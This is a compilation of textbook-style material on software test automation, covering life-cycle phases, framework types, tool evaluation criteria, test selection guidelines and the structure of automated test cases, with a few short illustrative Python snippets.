• Test cases which are executed on an ad-hoc basis

Test automation allows performing different types of testing efficiently and effectively.

Poor-quality software applications increase costs, impact revenue and negatively affect reputation.

Organizations must optimize the quality of increasingly complex software applications more quickly and cost-effectively than ever before to deliver the winning solutions that yield a high ROI and drive competitive advantage.

While testing does not guarantee quality it is a crucial part of the lifecycle quality process. Software test automation can reduce redundant, manual testing while maximizing repeatability and test accuracy to improve the breadth of testing. And while test automation already provides many benefits in traditional development environments, agile development methodologies make the use of test automation essential.


Advantages of test automation

Automated testing delivers the following long-term advantages:

• Reusability – Test automation does not require users to start from scratch with each new testing effort. Reusable tests will run more frequently, enabling personnel to find and fix more errors earlier in the development process and build libraries of repeatable test assets – in effect, transforming each test into intellectual property with long-term value.

• Predictability and consistency – QA using test automation can rerun a test with the utmost consistency, critical when development teams create a new build. Regression tests quickly verify whether pre-existing functionality still works in the new version and provide early development feedback. The testing process itself also benefits from consistency: a repeatable process for documenting test results enables QA to reproduce and verify errors – accelerating the resolution process.

• Productivity – Automated testing creates a high productivity environment for organizations without requiring additional resources. For example, QA organizations can run unattended tests, 24/7, across multiple platforms, browsers and environments simultaneously, allowing personnel to concentrate on other quality issues. The resulting productivity gains have the dual effect of shortening test cycles and increasing opportunities to optimize software quality.

• Efficiency – Delivering easy-to-use test automation software that is accessible to users with differing levels of technical expertise enables different user roles to effectively contribute to testing in a coherent, managed, collaborative environment.

Automation Process

The following steps are followed in an automation process:


Test tool selection

Test tool selection largely depends on the technology the Application Under Test is built on. For instance, QTP does not support Informatica, so it cannot be used for testing Informatica applications. It is a good idea to conduct a proof of concept of the tool on the AUT.

Define the scope of Automation

The scope of automation is the area of your Application Under Test which will be automated. The following points help determine the scope:

• Features that are important for the business
• Scenarios which involve a large amount of data
• Common functionalities across applications
• Technical feasibility
• The extent to which business components are reused
• The complexity of test cases
• The ability to use the same test cases for cross-browser testing

Planning, Design and Development

During this phase you create the automation strategy and plan, which contains the following details:

• Automation tools selected
• Framework design and its features
• In-scope and out-of-scope items of automation
• Automation test bed preparation
• Schedule and timeline of scripting and execution
• Deliverables of automation testing

Test Execution

Automation scripts are executed during this phase. The scripts need input test data before they are set to run. Once executed, they provide detailed test reports.

Execution can be performed using the automation tool directly or through the Test Management tool which will invoke the automation tool.


Example: Quality Center is a test management tool which will in turn invoke QTP for execution of automation scripts. Scripts can be executed on a single machine or a group of machines. Execution can be done overnight to save time.

Maintenance

As new functionalities are added to the System Under Test with successive cycles, automation scripts need to be added, reviewed, and maintained for each release cycle. Maintenance becomes necessary to improve the effectiveness of the automation scripts.

Benefits of automated testing

The following are benefits of automated testing:

• As much as 70% faster than manual testing
• Wider test coverage of application features
• Reliable results
• Ensures consistency
• Saves time and cost
• Improves accuracy
• No human intervention is required during execution
• Increases efficiency
• Better speed in executing tests
• Reusable test scripts
• Allows testing frequently and thoroughly
• More cycles of execution can be achieved through automation
• Earlier time to market

phases involved in Test Automation Life Cycle

Following are the phases involved in the Test Automation Life Cycle. These can vary from organization to organization or project to project.

1. Automation Feasibility Analysis
2. Test Strategy
3. Environment Set-up
4. Test Script Development
5. Test Script Execution
6. Test Result Generation and Analysis

Below is the snapshot of Test Automation Life Cycle.


Fig: Test Automation Life Cycle

1. Automation Feasibility Analysis

Before kicking off a test automation implementation, it is mandatory to analyze the feasibility of the application under test (AUT): is the AUT the right candidate for test automation or not?

A feasibility analysis should also be done on the manual test case pack, which enables the automation engineers to design the test scripts.

Apart from the above, a tool feasibility check can be done if your client insists on using a recommended tool.

The following feasibility checks should be done before beginning test automation:

• AUT automation feasibility
• Test case automation feasibility
• Tool feasibility

2. Test Strategy

Test strategy is the most critical phase in test automation. This phase defines how to approach and accomplish the mission. First and foremost in the test strategy is the selection of the test automation framework.

Following are the types of test automation framework:


1. Record and Playback Framework
2. Functional Decomposition Framework
3. Keyword/Table-Driven Framework
4. Data-Driven Framework
5. Hybrid Framework
6. Business Process Framework

Most projects prefer the hybrid framework, which combines the keyword-driven and data-driven frameworks, because it offers high reusability and is more robust compared with the other kinds of frameworks.
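The core idea behind the hybrid approach can be sketched in a few lines of Python: keywords map to small action functions (the keyword-driven half), while the test itself is just a table of data rows that a non-programmer could maintain (the data-driven half). Everything below is illustrative, not any particular framework's API.

def open_page(url):
    print(f"opening {url}")

def enter_text(field, value):
    print(f"typing '{value}' into {field}")

def click(button):
    print(f"clicking {button}")

# Keyword vocabulary: each keyword is bound to an action function.
KEYWORDS = {"open": open_page, "type": enter_text, "click": click}

# The test "table": adding a test means adding rows, not code.
test_steps = [
    ("open", "https://app.example.com/login"),
    ("type", "username", "alice"),
    ("type", "password", "s3cret!"),
    ("click", "submit"),
]

for keyword, *args in test_steps:
    KEYWORDS[keyword](*args)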

Other factors involved in the test strategy are as follows:

1. Schedule
2. Number of resources
3. Defining SLAs
4. Mode of the communication process
5. Defining in-scope and out-of-scope items
6. Return on investment analysis

3. Environment Set up

It is ideal to execute test automation scripts in a regression environment. The test environment set-up phase has the following tasks:

1. Sufficient tool licenses
2. Sufficient add-in licenses
3. Sufficient utilities, such as comparison tools and advanced text editors
4. Implementation of the automation framework
5. AUT access and valid credentials

4. Test Script Development

This phase is the inception of the test automation implementation. The activities of the automation test engineers are as follows:

1. Object identification
2. Creating function libraries
3. Building the scripts
4. Unit testing the scripts
5. Warm-up test execution

5. Test Script Execution

Unit-tested and signed-off test scripts are delivered to the automation testing team for script execution. The tasks of the test script execution team are as follows:

1. Test script execution
2. Updating the execution or coverage tracker
3. Defect logging

6. Test Result Generation and Analysis

Result generation and analysis is the last phase and produces important deliverables of test automation. Results must be baselined and signed off. The important activities in this phase are:

1. Result analysis
2. Report generation
3. Documenting the issues and knowledge gained
4. Preparation of the client presentation

Manual testing is performed by a human sitting in front of a computer carefully executing the test steps. Automation testing means using an automation tool to execute your test case suite. The automation software can also enter test data into the system under test, compare expected and actual results, and generate detailed test reports.

Test automation demands considerable investments of money and resources. Successive development cycles will require execution of the same test suite repeatedly. Using a test automation tool, it is possible to record this test suite and re-play it as required. Once the test suite is automated, no human intervention is required. This improves the ROI of test automation.

The goal of automation is to reduce the number of test cases to be run manually, not to eliminate manual testing altogether.

Framework in Automation

A framework is a set of automation guidelines which help in:

• Maintaining consistency of testing
• Improving test structuring
• Minimizing the amount of code
• Reducing code maintenance
• Improving reusability
• Allowing non-technical testers to be involved
• Reducing the training period for using the tool
• Involving data wherever appropriate

There are four types of framework used in software automation testing:


1. Data-Driven Automation Framework
2. Keyword-Driven Automation Framework
3. Modular Automation Framework
4. Hybrid Automation Framework

Benefits

To many people, the benefits of automation are pretty obvious. Tests can be run faster, they're consistent, and tests can be run over and over again with less overhead. As more automated tests are added to the test suite more tests can be run each time thereafter. Manual testing never goes away, but these efforts can now be focused on more rigorous tests.

There are some common 'perceived' benefits that I like to call 'bogus' benefits. Since test automation is an investment it is rare that the testing effort will take less time or resources in the current release. Sometimes there's the perception that automation is easier than testing manually. It actually makes the effort more complex since there's now another added software development effort. Automated testing does not replace good test planning, writing of test cases or much of the manual testing effort.

Costs

Costs of test automation include personnel to support test automation for the long term. As mentioned, there should be a dedicated test environment as well as the costs for the purchase, development and maintenance of tools. All of the efforts to support software development, such as planning, designing, configuration management, etc. apply to test automation as well.

Optimization of Speed, Efficiency, Quality and the Decrease of Costs

The main goal in software development processes is a timely release. Automated tests run fast and frequently, due to reused modules within different tests. Automated regression tests which ensure the continuous system stability and functionality after changes to the software were made lead to shorter development cycles combined with better quality software and thus the benefits of automated testing quickly outgain the initial costs.


Advance a Tester's Motivation and Efficiency

Manual testing can be mundane, error-prone and therefore become exasperating. Test automation alleviates testers' frustrations and allows the test execution without user interaction while guaranteeing repeatability and accuracy. Instead testers can now concentrate on more difficult test scenarios.

Increase of Test Coverage

Sufficient test coverage of software projects is often achieved only with great effort. Frequent repetition of the same or similar test cases is laborious and time consuming to perform manually. Some examples are:

• Regression testing after debugging or further development of software
• Testing of software on different platforms or with different configurations
• Data-driven testing (creation of tests using the same actions but with many different inputs)
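The data-driven case in particular is almost free to automate. Here is a minimal sketch with pytest's parametrize decorator, using a made-up password rule as the unit under test: one test body runs once per data row.

import pytest

def is_valid_password(pw):
    """Example rule under test: at least 6 characters including a digit."""
    return len(pw) >= 6 and any(c.isdigit() for c in pw)

@pytest.mark.parametrize("password,expected", [
    ("abc1def", True),
    ("short1", True),
    ("abc1", False),       # too short
    ("abcdefgh", False),   # no digit
])
def test_password_rule(password, expected):
    assert is_valid_password(password) == expected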

Automate to increase efficiencies

Test automation can accelerate the testing cycle and promote software quality. Automating regression tests and other repetitive tasks releases QA personnel to expand their quality efforts. That means they can increase test coverage by extending automation to parts of the application that may not have been thoroughly tested in prior releases. The use of data-driven automation approaches and frameworks further increases testing efficiency and can underpin effective configuration testing.


12.10 SYSTEM TEST AUTOMATION

It is absolutely necessary for any testing organization to move forward to become more efficient, in particular in the direction of test automation. The reasons for automating test cases are given in Table 12.13. It is important to think about automation as a strategic business activity. A strategic activity requires senior management support; otherwise it will most likely fail due to lack of funding. It should be aligned with the business mission and goals and a desire to speed up delivery of the system to the market without compromising quality. However, automation is a long-term investment; it is an on-going process. It cannot be achieved overnight; expectations need to be managed to ensure that they are realistically achievable within a certain time period.

TABLE 12.13 Benefits of Automated Testing

1. Test engineer productivity
2. Coverage of regression testing
3. Reusability of test cases
4. Consistency in testing
5. Test interval reduction
6. Reduced software maintenance cost
7. Increased test effectiveness



The organization must assess and address a number of considerations before test automation can proceed. The following prerequisites need to be considered for an assessment of whether or not the organization is ready for test automation:

• The system is stable and its functionalities are well defined.

• The test cases to be automated are unambiguous.

• The test tools and infrastructure are in place.

• The test automation professionals have prior successful experience with automation.

• Adequate budget has been allocated for the procurement of software tools.

The system must be stable enough for automation to be meaningful. If the system is constantly changing or frequently crashing, the maintenance cost of the automated test suite will be rather high to keep the test cases up to date with the system. Test automation will not succeed unless detailed test procedures are in place. It is very difficult to automate a test case which is not well defined to be manually executed. If the tests are executed in an ad hoc manner without developing the test objectives, detailed test procedure, and pass–fail criteria, then they are not ready for automation. If the test cases are designed as discussed in Chapter 11, then automation is likely to be more successful.

The test engineers should have significant programming experience. It is not possible to automate tests without using programming languages, such as Tcl (Tool command language), C, Perl, Python, Java, and Expect. It takes months to learn a programming language. The development of an automation process will fail if the testers do not have the necessary programming skills or are reluctant to develop them. Adding temporary contractors to the test team in order to automate test cases may not work. The contractors may assist in developing test libraries but will not be able to maintain an automated test suite on an on-going basis.

Adequate budget should be available to purchase and maintain new software and hardware tools to be used in test automation. The organization should keep aside funds to train the staff on new software and hardware tools. Skilled professionals with a good automation background may need to be added to the test team in order to carry out the test automation project. Therefore, additional head count should be budgeted by the senior executives of the organization.

12.11 EVALUATION AND SELECTION OF TEST AUTOMATION TOOLS

A test automation tool is a software application that assists in the automation of test cases that would otherwise be run manually. Some tools are commercially available in the market, but for testing complex, embedded, real-time systems, very few commercial test tools exist. Therefore, most organizations build their own test automation frameworks using programming languages such as C and Tcl. It is essential to combine both hardware and software for real-time testing tools.



This is due to the fact that special kinds of interface cards are required to be connected to the SUT. The computing power of personal computers with network interface cards may not be good enough to send traffic to the SUT.

Test professionals generally build their own test tools in high-technology fields, such as telecommunication equipment and applications based on IP. Commercial third-party test tools are usually not available during the system testing phase. For example, there were no commercially available test tools during the testing of the 1xEV-DO system described in Chapter 8. The second author of this book developed in-house software tools to simulate access terminals using their own products. However, we advocate that testers should build their own test automation tools only if they have no alternative. Building and maintaining one's own test automation tool from scratch is a time-consuming and expensive undertaking. Test tool evaluation criteria are formulated for the selection of the right kind of software tool. There may be no tool that fulfills all the criteria. Therefore, we should be a bit flexible during the evaluation of off-the-shelf automation tools available in the market. The broad criteria for evaluating test automation tools have been classified into the following eight categories, as shown in Figure 12.3.

Figure 12.3 Broad criteria of test automation tool evaluation: test development, test maintenance, test execution, test results, test management, GUI testing capability, vendor qualification, and pricing.

1. Test Development Criteria: An automation test tool should provide a high-level, preferably nonproprietary, easy-to-use test scripting language such as Tcl. It should have the ability to interface with and drive modules that can be easily written in, for example, C, Tcl, Perl, or Visual Basic. The tool must provide the facility to directly access, read, modify, and control the internals of the automated test scripts. The input test data should be stored separately from the test script but easily cross-referenced to the corresponding test scripts, if necessary. The tool should have built-in templates of test scripts, test cases, tutorials, and demo application examples to show how to develop automated test cases. Finally, no changes should be made to the SUT in order to use the tool. The vendor's recommended environment should match the real test laboratory execution environment.

2. Test Maintenance Criteria: The tool should possess a rich set of features, such as version control capability on test cases and test data and migration of test cases across different platforms. The tool must provide powerful, easy-to-use facilities to browse, navigate, modify, and reuse the test suites. The tool should have the ability to select a subset of test cases to form a group for a particular test run based on one or more distinguishing characteristics. A tool needs to have features that allow modification and replication of test cases, easy addition of new test cases, and import of test cases from another test suite. The tool should have the capability to add multiple tags to a test case and modify those tags so that the test case can be easily selected into a subgroup of test cases sharing a common characteristic, as illustrated in the sketch below.
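As a concrete illustration of tagging and subgroup selection, consider the following minimal Python sketch. The TestCase record and the select_by_tags helper are hypothetical names invented for this example, not features of any particular commercial tool.

from dataclasses import dataclass, field

@dataclass
class TestCase:
    """A test case record carrying multiple tags for subgroup selection."""
    case_id: str
    title: str
    tags: set = field(default_factory=set)

def select_by_tags(suite, required_tags):
    """Return the subset of test cases carrying all of the given tags."""
    required = set(required_tags)
    return [tc for tc in suite if required <= tc.tags]

suite = [
    TestCase("TC-001", "Login with valid credentials", {"smoke", "gui"}),
    TestCase("TC-002", "Reboot under sustained load", {"stress", "regression"}),
    TestCase("TC-003", "Login lockout after retries", {"regression", "gui"}),
]

# Form a group for a particular test run based on a common characteristic.
for tc in select_by_tags(suite, {"regression"}):
    print(tc.case_id, tc.title)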

3. Test Execution Criteria: An automation tool should allow test cases to be executed individually, as a group, or in a predefined sequence. The user should have the ability to check the interim results during the execution of a group of tests and to exercise other options for the remainder of the tests based on the interim results. The user should have the option to pause and resume the execution of a test suite. The tool should have the facility to execute the test suite over the Internet. The tool should allow simultaneous execution of several test suites that can be distributed across multiple machines for parallel execution. This substantially reduces the time needed for testing if multiple test machines are available. The test tool should have a capability for monitoring, measuring, and diagnosing performance characteristics of the SUT. Finally, the tool should have the capability to be integrated with other software tools which are either in use or expected to be used.

4. Test Results Criteria: The test tool must provide a flexible, comprehensive logging process during execution of the test suite, which may include detailed records of each test case, test results, time and date, and pertinent diagnostic data. A tool should have the capability to cross-reference the test results back to the right versions of test cases. The test result log should be archivable in an industry-standard data format, and the tool should have an effective way to access and browse the archived test results. The tool should provide query capability to extract test results, analyze the test status and trend, and produce graphical reports of the test results. Finally, the tool should have the capability to collect and analyze response time and throughput as an aid to performance testing.

5. Test Management Criteria: A tool should provide a test structure, or hierarchy, that allows test cases to be stored and retrieved in the manner in which the test organization wants to organize them. The tool should have the capability to allocate tests or groups of tests to specific test engineers and to compare the work status with the plan through a graphic display. A tool needs to have authorization features. For example, a test script developer may be authorized to create and update the test scripts, while the test executor can only access them in the run mode. The tool should have the capability to send out emails with the test results after completion of test suite execution.


6. GUI Testing Capability Criteria: An automated GUI test tool should include a record/playback feature which allows the test engineers to create, modify, and run automated tests across many environments. These tools should have a capability to recognize and deal with all types of GUI objects, such as list boxes, radio buttons, icons, joysticks, hot keys, and bit-map images with changes in color shades and presentation fonts. The keystrokes entered by the test engineer and captured by the tool's recording activity can be represented as scripts in a high-level programming language and saved for future replay. The tools must allow test engineers to modify test scripts to create reusable test procedures to be played back on a new software image for comparison. The performance of a GUI test tool also needs to be evaluated. One may consider the question: How fast can the tool record and play back a complex test scenario or a group of test scenarios?

7. Vendor Qualification Criteria: Many questions need to be asked about the vendor's financial stability, the age of the vendor company, and its capability to support the tool. The vendor must be willing to fix problems that arise with the tool. A future roadmap must exist for the product. Finally, the maturity and market share of the product must be evaluated.

8. Pricing Criteria: Pricing is an important aspect of the product evaluation criteria. One can ask a number of questions: Is the price competitive? Is it within the estimated price range for an initial tool purchase? For a large number of licenses, a pricing discount can be negotiated with the vendor. Finally, the license must explicitly cap the maintenance cost of the test tool from year to year.

Tool vendors may guarantee the functionality of the test tool; however, experience shows that test automation tools often do not work as expected within a particular test environment. Therefore, it is recommended to evaluate a test tool by using it before making the decision to purchase it. The test team leader needs to contact the tool vendor to request a demonstration. After a demonstration of the tool, if the test team believes that the tool holds potential, then the test team leader may ask for a temporary license of the tool for evaluation. At this point enough resources are allocated to evaluate the test tool. The evaluator should have a clear understanding of the tool requirements and should make a test evaluation plan based on the criteria outlined previously. The goal here is to ensure that the test tool performs as advertised by the vendor and that the tool is the best product for the requirement. Following the hands-on evaluation process, an evaluation report is prepared. The report documents the hands-on experience with the tool. This report should contain background information, a tool summary, technical findings, and a conclusion. The document is designed to address management concerns, because eventually it has to be approved by executive management.

12.12 TEST SELECTION GUIDELINES FOR AUTOMATION

Test cases should be automated only if there is a clear economic benefit over manual execution. Some test cases are easy to automate, while others are more cumbersome.


The general guidelines shown in Figure 12.4 may be used in evaluating the suitability of test cases to be automated, as follows:

Less Volatile: A test case is stable and is unlikely to change over time. The test case should have been executed manually before. It is expected that the test steps and the pass–fail criteria are not likely to change any more.

Repeatability: Test cases that are going to be executed several times should be automated. However, one-time test cases should not be considered for automation. Poorly designed test cases, which tend to be difficult to reuse, are not economical to automate.

High Risk: High-risk test cases are those that are routinely rerun after every new software build. The objectives of these test cases are so important that one cannot afford not to reexecute them. In some cases the propensity of the test cases to break is very high. These test cases are likely to be fruitful in the long run and are the right candidates for automation.

Easy to Automate: Test cases that are easy to automate using automation tools should be automated. Some features of the system are easier to test than other features, based on the characteristics of a particular tool. Custom objects with graphic and sound features are likely to be more expensive to automate.

Manually Difficult: Test cases that are very hard to execute manually should be automated. Manual test executions can be a big problem, for example, causing eye strain from having to look at too many screens for too long in a GUI test. It is strenuous to look at transient results in real-time applications. These unpleasant test cases are good candidates for automation.

Boring and Time Consuming: Test cases that are repetitive in nature and need to be executed for long periods of time should be automated. The tester's time should be utilized in the development of more creative and effective test cases.

Figure 12.4 Test selection guidelines for automation: less volatile, repeatability, high risk, easy to automate, manually difficult, and boring and time consuming.


12.13 CHARACTERISTICS OF AUTOMATED TEST CASES

The largest component of test case automation is programming. Unless test cases are designed and coded properly, their execution and maintenance may not be effective. The design characteristics of effective test cases were discussed in Chapter 11. A formal model of a standard test case schema was also provided in Chapter 11. In this section, we include some key points which are pertinent to the coding of test cases. The characteristics of good automated test cases are given in Figure 12.5 and explained in the following.

1. Simple: The test case should have a single objective. Multiobjective test cases are difficult to understand and design. There should not be more than 10–15 test steps per test case, excluding the setup and cleanup steps. Multipurpose test cases are likely to break or to give misleading results. If the execution of a complex test leads to a system failure, it is difficult to isolate the cause of the failure.

2. Modular: Each test case should have a setup phase and a cleanup phase, before and after the execution of the test steps, respectively. The setup phase ensures that the initial conditions are met before the start of the test steps. Similarly, the cleanup phase puts the system back in the initial state, that is, the state prior to setup. Each test step should be small and precise. One input stimulus should be provided to the system at a time and the response verified (if applicable) with an interim verdict. The test steps are building blocks from reusable libraries that are put together to form multistep test cases. A sketch of this structure follows.
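The following minimal Python sketch illustrates the modular structure; the sut object and its method names are hypothetical assumptions for this example, not part of any specific framework.

def setup(sut):
    # Ensure the initial conditions are met before the test steps run.
    sut.connect()
    sut.load_default_configuration()

def cleanup(sut):
    # Put the system back in the state it was in prior to setup.
    sut.restore_configuration()
    sut.disconnect()

def test_single_login(sut):
    """One objective; small, precise steps; one stimulus at a time."""
    setup(sut)
    try:
        response = sut.send("login alice secret")  # step 1: stimulus
        assert "OK" in response                    # interim verdict
        response = sut.send("whoami")              # step 2: stimulus
        assert response.strip() == "alice"         # interim verdict
    finally:
        cleanup(sut)                               # always restore state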

Figure 12.5 Characteristics of automated test cases: simple, modular, robust and reliable, reusable, maintainable, documented, and independent and self-sufficient.

3. Robust and Reliable: A test case verdict (pass or fail) should be assigned in a way that is unambiguous and understandable. Robust test cases can ignore trivial failures, such as a one-pixel mismatch in a graphical display. Care should be taken to minimize false test results. The test cases must have built-in mechanisms to detect and recover from errors. For example, a test case need not wait indefinitely if the SUT has crashed; rather, it can wait for a while and terminate an indefinite wait by using a timer mechanism, as sketched below.
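A minimal sketch of such a timer mechanism in Python, assuming a hypothetical non-blocking sut.poll_response() call:

import time

def wait_for_response(sut, timeout_s=30.0, poll_interval_s=0.5):
    """Wait for a response from the SUT, but never wait indefinitely.

    Returns the response, or None if the deadline expires (e.g., because
    the SUT has crashed), so the test can fail cleanly instead of hanging.
    """
    deadline = time.monotonic() + timeout_s
    while time.monotonic() < deadline:
        response = sut.poll_response()  # hypothetical non-blocking check
        if response is not None:
            return response
        time.sleep(poll_interval_s)
    return None  # timer expired: assign a fail verdict and run cleanup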

4. Reusable: The test steps are built to be configurable; that is, variables should not be hard coded. They can take values from a single configuration file. Attention should be given while coding test steps to ensure that a single, centralized set of configuration variables is used instead of multiple, decentralized, hard-coded variables. Test steps are made as independent of test environments as possible. The automated test cases are categorized into different groups so that subsets of test steps and test cases can be extracted to be reused for other platforms and/or configurations. Finally, in GUI automation, hard-coded screen locations must be avoided. A configuration-driven sketch follows.
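As a minimal sketch of this configuration-driven style in Python, assume a simple INI file named testbed.ini; the file name and keys are invented for this example.

import configparser

# testbed.ini (illustrative contents):
# [sut]
# host = 192.0.2.10
# port = 8022
# login_prompt = login:

config = configparser.ConfigParser()
config.read("testbed.ini")

# Test steps read these values instead of hard coding them.
SUT_HOST = config["sut"]["host"]
SUT_PORT = config.getint("sut", "port")
LOGIN_PROMPT = config["sut"]["login_prompt"]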

5. Maintainable: Any changes to the SUT will have an impact on the automated test cases and may require changes to the affected test cases. Therefore, an assessment of the test cases that need to be modified should be conducted before a project to change the system is approved. The test suite should be organized and categorized in such a way that the affected test cases are easily identified. If a particular test case is data driven, it is recommended that the input test data be stored separately from the test case and accessed by the test procedure as needed. The test cases must comply with coding standards. Finally, all the test cases should be controlled with a version control system.

6. Documented: The test cases and the test steps must be well documented. Each test case gets a unique identifier, and the test purpose is clear and understandable. The creator's name, the date of creation, and the last time it was modified must be documented. There should be traceability to the features and requirements being checked by the test case. The situations under which the test case cannot be used are clearly described. The environment requirements are clearly stated, along with the source of input test data (if applicable). Finally, the pass–fail evaluation criteria are clearly described. A hypothetical template is sketched below.
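As an illustration, such documentation can be embedded directly in an automated test case. The header below is a hypothetical Python template with invented names, dates, and requirement identifiers, not a mandated format.

def test_tc_0231_login_lockout():
    """TC-0231: Verify account lockout after three failed login attempts.

    Creator:      J. Tester
    Created:      2008-09-14
    Modified:     2008-11-02
    Traces to:    Requirement SEC-4.2 (account lockout)
    Not usable:   when the SUT runs in single-user maintenance mode
    Environment:  one client, one authentication server; input test
                  data read from accounts.csv
    Pass-fail:    PASS if the fourth login attempt is rejected;
                  FAIL otherwise.
    """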

7. Independent and Self-Sufficient: Each test case is designed as a cohesive entity, and test cases should be largely independent of each other. Each test case consists of test steps which are naturally linked together. The predecessor and successor of a test step within a test case should be clearly understood. It is useful to keep the following three independence rules in mind while automating test cases:

• Data value independent: The possible corruption of data associated with one test case should have no impact on other test cases.

• Failure independent: The failure of one test case should not cause a ripple of failures among a large number of subsequent test cases.

• Final state independent: The state in which the environment is left by a test case should have no impact on test cases to be executed later.

We must take into consideration the characteristics outlined in this section during the development of test scripts. In addition, we must follow the structure of an automated test case defined in the next section while implementing a test case.


12.14 STRUCTURE OF AN AUTOMATED TEST CASE

An automated test case mimics the actions of a human tester in terms of creating the initial conditions to execute the test, entering the input data to drive the test, capturing the output, evaluating the result, and finally restoring the system back to its original state. The six major steps in an automated test case are shown in Figure 12.6. Error handling routines are incorporated in each step to increase the maintainability and stability of test cases.

Setup: The setup includes steps to check the hardware, the network environment, and the software configuration, and to verify that the SUT is running. In addition, all the parameters of the SUT that are specific to the test case are configured. Other variables pertinent to the test case are initialized.

Drive the Test: The test is driven by providing input data to the SUT. It can be a single step or multiple steps. The input data should be generated in such a way that the SUT can read, understand, and respond.

Capture the Response: The response from the SUT is captured and saved. Manipulation of the output data from the system may be required to extract the information that is relevant to the objective of the test case.

Determine the Verdict: The actual outcome is compared with the expected outcome. Predetermined decision rules are applied to evaluate any discrepancies between the actual outcome and the expected outcome and to decide whether the test result is a pass or a fail. If a fail verdict is assigned to the test case, additional diagnostic information is needed. One must be careful in designing the rules for assigning a pass or fail verdict to a test case. A failed test procedure does not necessarily indicate a problem with the SUT; the failure could be a false positive. Similarly, a passed test procedure does not necessarily indicate that there is no problem with the SUT; the result could be a false negative. The problems of false negatives and false positives can occur for several reasons, such as setup errors, test procedure errors, test script logic errors, or user errors [18].

Log the Verdict: A detailed record of the results is written in a log file. If the test case failed, additional diagnostic information is logged, such as environment information at the time of failure, which may be useful in reproducing the problem later.

Cleanup: A cleanup action includes steps to restore the SUT to its original state so that the next test case can be executed. The setup and cleanup steps within the test case need to be efficient in order to reduce the overhead of test execution.

Figure 12.6 Six major steps in an automated test case: setup, drive the test, capture the response, determine the verdict, log the verdict, and cleanup.
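The six steps can be put together in a single skeleton. The Python sketch below is one possible shape, with hypothetical sut helper calls invented for this example; basic error handling is folded in so that cleanup always runs.

import logging

def run_test_case(sut, case_id, stimulus, expected):
    log = logging.getLogger(case_id)
    try:
        # 1. Setup: check the environment and configure SUT parameters.
        sut.connect()
        sut.configure_for(case_id)

        # 2. Drive the test: provide the input data to the SUT.
        sut.send(stimulus)

        # 3. Capture the response and extract the relevant part.
        actual = sut.capture_response()

        # 4. Determine the verdict by comparing actual with expected.
        verdict = "PASS" if actual == expected else "FAIL"

        # 5. Log the verdict, with diagnostics on failure.
        log.info("%s: %s", case_id, verdict)
        if verdict == "FAIL":
            log.info("expected=%r actual=%r env=%r",
                     expected, actual, sut.environment_snapshot())
        return verdict
    finally:
        # 6. Cleanup: restore the SUT so the next test case can run.
        sut.restore()
        sut.disconnect()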

12.15 TEST AUTOMATION INFRASTRUCTURE

A test automation infrastructure, or framework, consists of the test tools, equipment, test scripts, procedures, and people needed to make test automation efficient and effective. The creation and maintenance of a test automation framework are key to the success of any test automation project within an organization. The implementation of an automation framework generally requires an automation test group, as discussed in Chapter 16. The six components of a test automation framework are shown in Figure 12.7. The idea behind an automation infrastructure is to ensure the following:

• Different test tools and equipment are coordinated to work together.

• The library of existing test case scripts can be reused for different test projects, thus minimizing the duplication of development effort.

• Nobody creates test scripts in their own ways.

• Consistency is maintained across test scripts.

• The test suite automation process is coordinated such that it is available just in time for regression testing.

• People understand their responsibilities in automated testing.

System to Be Tested: This is the first component of an automation infrastructure. The subsystems of the system to be tested must be stable; otherwise test automation will not be cost effective. As an example, the 1xEV-DO system described in Chapter 8 consists of three subsystems: BTS, BSC, and EMS. All three subsystems must be stable and work together as a whole before the start of an automation test project.

Test Platform: The test platform and facilities, that is, the network setup on which the system will be tested, must be in place to carry out the test automation project. For example, a procedure to download the image of the SUT, configuration management utilities, servers, clients, routers, switches, and hubs are necessary to set up the automation environment to execute the test scripts.


Figure 12.7 Components of automation infrastructure: system to be tested, test platform, test case library, automated testing practices, tools, and administrator.

Test Case Library: It is useful to compile libraries of reusable test steps and basic utilities to be used as the building blocks of automated test scripts. Each utility typically performs a distinct task to assist the automation of test cases. Examples of such utilities are ssh (secure shell) from client to server, exit from client to server, response capture, information extraction, rules for verdicts, verdict logging, error logging, cleanup, and setup. A small sketch of such a library follows.
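The fragment below sketches what two such utilities might look like in Python; the module name, signatures, and log format are assumptions for this example rather than a prescribed design.

# testlib.py -- illustrative reusable test-step utilities.
import subprocess

def ssh_run(host, command, timeout_s=30):
    """Run a command on a remote host over ssh and capture its output."""
    result = subprocess.run(
        ["ssh", host, command],
        capture_output=True, text=True, timeout=timeout_s,
    )
    return result.returncode, result.stdout

def log_verdict(case_id, verdict, logfile="results.log"):
    """Append a verdict record for one test case to a shared log file."""
    with open(logfile, "a") as f:
        f.write(f"{case_id} {verdict}\n")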

Automated Testing Practices: The procedures describing how to automate test cases using the test tools and test case libraries must be documented. A template of an automated test case is useful in order to have consistency across all the automated test cases developed by different engineers. A list of all the utilities and guidelines for using them will enable better efficiency in test automation. In addition, the maintenance procedures for the library must be documented.

Tools: Different types of tools are required for the development of test scripts. Examples of such tools are test automation tools, traffic generation tools, traffic monitoring tools, and support tools. The support tools include test factory, requirement analysis, defect tracking, and configuration management tools. Integration of test automation and support tools, such as defect tracking, is crucial for the automatic reporting of defects for failed test cases. Similarly, the test factory tool can generate automated test execution trends and result patterns.

Administrator: The automation framework administrator (i) manages test case libraries, test platforms, and test tools; (ii) maintains the inventory of templates; (iii) provides tutorial assistance to the users of test tools; and (iv) helps test engineers write test scripts using the test case libraries. In addition, the administrator maintains a liaison with the tool vendors and the users.


Test oracles

An oracle is a mechanism for determining whether the program has passed or failed a test.

A complete oracle would have three capabilities and would carry them out perfectly:

• A generator, to provide predicted or expected results for each test.

• A comparator, to compare predicted and obtained results.

• An evaluator, to determine whether the comparison results are sufficiently close to be a pass.

One of the key problems with oracles is that they can only address a small subset of the inputs and outputs actually associated with any test. The tester might intentionally set the values of some variables, but all of the program's other variables have values too. Configuration settings, amount of available memory, and program options can also affect the test results. As a result, our evaluation of the test results (that we look at) in terms of the test inputs (that we set intentionally) is based on incomplete data, and may be incorrect.

Any of the oracle capabilities may be automated. For example, we might generate predictions for a test from previous test results on this program, from the behavior of a previous release of this program or a competitor's program, from a standard function, or from a custom model. We might generate these by hand, by a tool that feeds input to the reference program and captures output, or by something that combines automated and manual testing. We might instead generate predictions from specifications, advertised claims, regulatory requirements, or other sources of information that require a human to evaluate the information in order to generate the prediction.

A test oracle is a mechanism, different from the program itself, that can be used to check the correctness of the program's output for the test cases. Conceptually, we can consider testing as a process in which the test cases are given to the test oracle and to the program under test.


